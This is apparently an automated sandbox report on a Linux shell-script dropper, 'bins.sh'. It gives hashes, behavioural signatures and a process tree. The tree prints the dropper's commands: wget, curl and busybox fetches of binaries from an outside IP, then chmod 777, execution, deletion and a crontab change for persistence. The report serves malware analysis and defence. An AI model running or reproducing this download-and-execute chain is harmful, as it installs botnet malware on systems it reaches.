Analysis
- max time kernel: 14s
- max time network: 66s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 28-10-2024 10:12
- Static task: static1
- Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240611-en)
- Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240611-en)
- Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240611-en)
- Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240611-en)
General
- Target: bins.sh
- Size: 10KB
- MD5: 019b932cccb51c260ae4464eb3fd0092
- SHA1: c279f35f12944e0c4277449bb08dcbd8738f4ffb
- SHA256: d2f402d2f4147e1cb42252757661db0b29a8ba02bc3dc2cb8ecc85bd552d6e13
- SHA512: 24c2904d745466745babb3702d7f821bfff0b46bcc0bd80ed128772d5b747859deed32ffa836e2316d6673def113ac732ea81641fc68a12aceeb3884bb80dcb6
- SSDEEP: 96:jz5y3yWV+e0QRfltDeRN0mW9OC9Ytzs5j/uBfltDeRN2dmW9OCfJu0wGvqwP/Kze:AyQvbmW9OC9Yds5jILmW9OC9HC+
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 686 chmod; 767 chmod; 781 chmod; 795 chmod; 787 chmod; 673 chmod; 711 chmod; 725 chmod; 737 chmod; 750 chmod
- Executes dropped EXE (10 IoCs)
  Processes (pid, process, path):
    675 OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX (/tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX)
    687 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC (/tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC)
    713 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V (/tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V)
    727 fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS (/tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS)
    738 ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN (/tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN)
    752 Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 (/tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6)
    768 kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ (/tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ)
    782 pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh (/tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh)
    788 sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG (/tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG)
    796 MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ (/tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ)
- Renames itself (1 IoCs)
  Processes (pid, process): 688 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description, ioc, process): File opened for modification /var/spool/cron/crontabs/tmp.BvkgLH (crontab)
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTPs, 5 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes (description, ioc, process): File opened for reading /proc/cpuinfo (curl), 5 times
- Reads runtime system information
  Processes (description, ioc, process):
    lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC: File opened for reading /proc/<pid>/cmdline, for pids 109, 263, 734, 742, 3, 4, 137, 700, 789, 17, 643, 651, 20, 140, 710, 761, 773, 746, 760, 42, 76, 701, 715, 719, 731, 5, 645, 763, 799, 284, 790, 735, 9, 12, 13, 16, 43, 166, 11, 97, 138, 765, 699, 718, 757, 748, 1, 6, 15, 26, 683, 732, 783, 650, 698, 749, 755, 794
    curl: File opened for reading /proc/sys/crypto/fips_enabled (once) and /proc/self/auxv (3 times)
    crontab: File opened for reading /proc/filesystems (2 times)
- Writes file to tmp directory (14 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
    File opened for modification /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ (busybox)
    File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX (wget)
    File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC (wget)
    File opened for modification /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V (busybox)
    File opened for modification /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ (busybox)
    File opened for modification /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG (busybox)
    File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX (curl)
    File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC (busybox)
    File opened for modification /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS (busybox)
    File opened for modification /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 (busybox)
    File opened for modification /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh (busybox)
    File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX (busybox)
    File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC (curl)
    File opened for modification /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN (busybox)
Processes
Process tree (path | command line | PID | signatures), nested by depth:
- /tmp/bins.sh | /tmp/bins.sh | PID:645
  - /bin/rm | /bin/rm bins.sh | PID:647
  - /usr/bin/wget | wget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:648 | Writes file to tmp directory
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:664 | Checks CPU configuration; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:670 | Writes file to tmp directory
  - /bin/chmod | chmod 777 OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:673 | File and Directory Permissions Modification
  - /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | ./OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:675 | Executes dropped EXE
  - /bin/rm | rm OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX | PID:678
  - /usr/bin/wget | wget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:680 | Writes file to tmp directory
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:684 | Checks CPU configuration; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:685 | Writes file to tmp directory
  - /bin/chmod | chmod 777 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:686 | File and Directory Permissions Modification
  - /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | ./lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:687 | Executes dropped EXE; Renames itself; Reads runtime system information
    - /bin/sh | sh -c "crontab -l" | PID:689
      - /usr/bin/crontab | crontab -l | PID:690 | Reads runtime system information
    - /bin/sh | sh -c "crontab -" | PID:691
      - /usr/bin/crontab | crontab - | PID:692 | Creates/modifies Cron job; Reads runtime system information
  - /bin/rm | rm lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC | PID:698
  - /usr/bin/wget | wget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:703
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:705
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:708 | Writes file to tmp directory
  - /bin/chmod | chmod 777 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:711 | File and Directory Permissions Modification
  - /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | ./9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:713 | Executes dropped EXE
  - /bin/rm | rm 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V | PID:715
  - /usr/bin/wget | wget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:717
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:719
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:721 | Writes file to tmp directory
  - /bin/chmod | chmod 777 fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:725 | File and Directory Permissions Modification
  - /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | ./fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:727 | Executes dropped EXE
  - /bin/rm | rm fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS | PID:729
  - /usr/bin/wget | wget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:730
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:732
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:735 | Writes file to tmp directory
  - /bin/chmod | chmod 777 ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:737 | File and Directory Permissions Modification
  - /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | ./ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:738 | Executes dropped EXE
  - /bin/rm | rm ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN | PID:741
  - /usr/bin/wget | wget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:742
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:744
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:747 | Writes file to tmp directory
  - /bin/chmod | chmod 777 Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:750 | File and Directory Permissions Modification
  - /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | ./Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:752 | Executes dropped EXE
  - /bin/rm | rm Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 | PID:756
  - /usr/bin/wget | wget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:758
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:759 | Checks CPU configuration; Reads runtime system information
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:761 | Writes file to tmp directory
  - /bin/chmod | chmod 777 kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:767 | File and Directory Permissions Modification
  - /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | ./kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:768 | Executes dropped EXE
  - /bin/rm | rm kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ | PID:771
  - /usr/bin/wget | wget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:773
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:777
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:779 | Writes file to tmp directory
  - /bin/chmod | chmod 777 pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:781 | File and Directory Permissions Modification
  - /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | ./pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:782 | Executes dropped EXE
  - /bin/rm | rm pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh | PID:783
  - /usr/bin/wget | wget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:784
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:785 | Checks CPU configuration; Reads runtime system information
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:786 | Writes file to tmp directory
  - /bin/chmod | chmod 777 sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:787 | File and Directory Permissions Modification
  - /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | ./sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:788 | Executes dropped EXE
  - /bin/rm | rm sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG | PID:789
  - /usr/bin/wget | wget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:790
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:791 | Checks CPU configuration; Reads runtime system information
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:792 | Writes file to tmp directory
  - /bin/chmod | chmod 777 MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:795 | File and Directory Permissions Modification
  - /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | ./MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:796 | Executes dropped EXE
  - /bin/rm | rm MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ | PID:799
  - /usr/bin/wget | wget http://87.120.126.196/bins/ZUwwzf5RQTGsR9rxK4js3vcYM4ereP90ae | PID:800
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 129KB
  MD5: 54bec959d900ad930dc662f8092da57d
  SHA1: 9ae7ad9018eeac5aa89bcde68ec683a364ac7d55
  SHA256: b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
  SHA512: 904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
- Filesize: 93KB
  MD5: 8fad5e89ce3d2b6159ac2ce2fdf7c084
  SHA1: 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
  SHA256: 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
  SHA512: 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
- Filesize: 101KB
  MD5: a7e686eb3f74b104a5520f08cfd54eb5
  SHA1: 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
  SHA256: 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
  SHA512: 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
- Filesize: 84KB
  MD5: 64ece99ca4ab1c1405f5a3335d64a960
  SHA1: b7395f2320a5bdadb78943b268708965cdbd1d74
  SHA256: aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
  SHA512: bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
- Filesize: 129KB
  MD5: 52f72bcf31899453b40d37a7cbf55f35
  SHA1: 6dfca1bd70aad3e88713b02ec1669ba5a792456c
  SHA256: ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
  SHA512: be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967
- Filesize: 101KB
  MD5: 8d0f8d45165dc1f3ba334ce75be39621
  SHA1: 1d5baece9d5af3885276735c3c20d28e161e00ff
  SHA256: 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
  SHA512: a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
- Filesize: 95KB
  MD5: c20c610e14b8e59f5f8258a55fe7f27d
  SHA1: e59a0b83d9882f2770f052a213cad25b0cbd53fc
  SHA256: adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
  SHA512: dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
- Filesize: 100KB
  MD5: 3b78bb645b81d600c30713d416f666be
  SHA1: 23796112f2cce2afb2217498b5ecf2801ab550f2
  SHA256: d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
  SHA512: 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
- Filesize: 158KB
  MD5: d8e96e2fdd3c610ec19128e18de5abde
  SHA1: 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
  SHA256: f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
  SHA512: 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
- Filesize: 108KB
  MD5: c97a9c55ddb153e8bfce38f201d2cffb
  SHA1: 3970452f27327f98c2e3fdcabf0390067b48bd62
  SHA256: 138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
  SHA512: 1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
- Filesize: 210B
  MD5: 5dfe34fa8fe6a9fe09cc3f97b821e146
  SHA1: 431ff89a7f23e03f3717e841432aab0a40c831c6
  SHA256: e4c01747eafc1e79850fcf9ba9d5294253e29fd469ad7cfef6ddee2ab7af7aba
  SHA512: 2e18701cde70a61329fce5c339e792ad80acfe88be2b6560e4f91e6bb6cd044992f5e2f900b98d6fa9a8adfc5785defb8ff3637728d1d7e402193f226c0dbe8c